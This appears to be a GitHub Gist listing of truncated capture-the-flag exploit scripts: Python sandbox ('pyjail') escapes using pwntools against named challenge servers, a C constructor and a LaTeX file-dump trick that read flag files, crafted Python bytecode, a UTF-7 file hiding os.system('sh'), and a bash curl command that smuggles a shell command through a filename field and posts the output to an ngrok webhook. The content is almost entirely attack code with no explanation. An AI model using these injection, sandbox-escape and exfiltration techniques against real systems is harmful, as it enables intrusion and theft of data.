This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
import dis | |
def gen_varname() -> str: | |
d = {} | |
class Checker: | |
def __getattribute__(self, __name: str) -> bool: | |
if d.get(__name, False): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <fcntl.h> | |
#include <unistd.h> | |
__attribute__((constructor)) void pwn() { | |
// open /flag and printf it | |
int fd = open("/flag", O_RDONLY); | |
char buf[0x100]; | |
read(fd, buf, 0x100); | |
printf("%s", buf); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
def main() -> None: | |
io = remote("pyjail-revenge.chal.idek.team", 1337) | |
# __import__('__main__').any = all | |
# sys.modules = {'idlelib.pyshell': __import__('__main__')} | |
# import idlelib.idle | |
# https://github.com/python/cpython/blob/206f05a46b426eb374f724f8e7cd42f2f9643bb8/Lib/idlelib/idle.py#L13-L14 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from opcode import opmap | |
import dis | |
code = b"" | |
code += bytes([opmap["LOAD_CONST"], 0]) | |
code += bytes([opmap["GET_LEN"], 0]) | |
code += bytes([opmap["IMPORT_FROM"], 0]) | |
code += bytes([opmap["ROT_TWO"], 0]) | |
code += bytes([opmap["CALL_FUNCTION"], 1]) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
\RequirePackage{etoolbox} | |
\documentclass{article} | |
\providecommand{\x}{pdff} | |
\begin{document} | |
\csuse{\x iledump} offset 0 length 99 {/app/flag} | |
\end{document} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
WEBHOOK="0.tcp.jp.ngrok.io:11048" | |
curl -i -s -k -X $'POST' \ | |
-H $'Host: 34.124.157.94:10556' -H $'Content-Type: application/x-www-form-urlencoded' \ | |
--data-binary $'filename=--compress-program=sh -z /proc/self/cmdline -o /tmp/lebr0nli`curl${IFS}-d${IFS}$($(echo${IFS}L3JlYWRmbGFnCg==|base64${IFS}-d))${IFS}'"$WEBHOOK"'`' \ | |
$'http://34.124.157.94:10556/index.php' -o /dev/null |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# encoding: utf-7 | |
# a+AAo-import os;os.system('sh') | |
# upload this file as index.html to your github pages |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def gen_payload(name_idx: int) -> str: | |
payload = '(0 if 1 else f"' | |
for i in range(name_idx): | |
payload += "{a_%s}" % i | |
payload += '")' | |
payload = "(0 if %s else %s)" % (payload, f"a_{name_idx}") | |
return payload | |
payload = f""" | |
lambda getattr: [getattr(getattr, f"{{x}}") for x in {gen_payload(int(input()))}] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
WEBHOOK_URL = "https://webhook.site/64021412-a0e0-4f76-bde4-3bb705c13da4/" | |
def conn() -> tube: | |
if args.LOCAL: | |
return remote("localhost", 1337) | |
return remote("win.the.seetf.sg", 5000) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
with remote("rattler-read.chal.uiuc.tf", 1337) as io: | |
payload = ( | |
""" | |
g=(print(g.gi_frame.f_back.f_back.f_builtins['open']('/flag.txt').read())for x in(0,)) | |
for x in g:0 | |
""".strip() | |
.replace("\n", "\r") | |
.encode() |
OlderNewer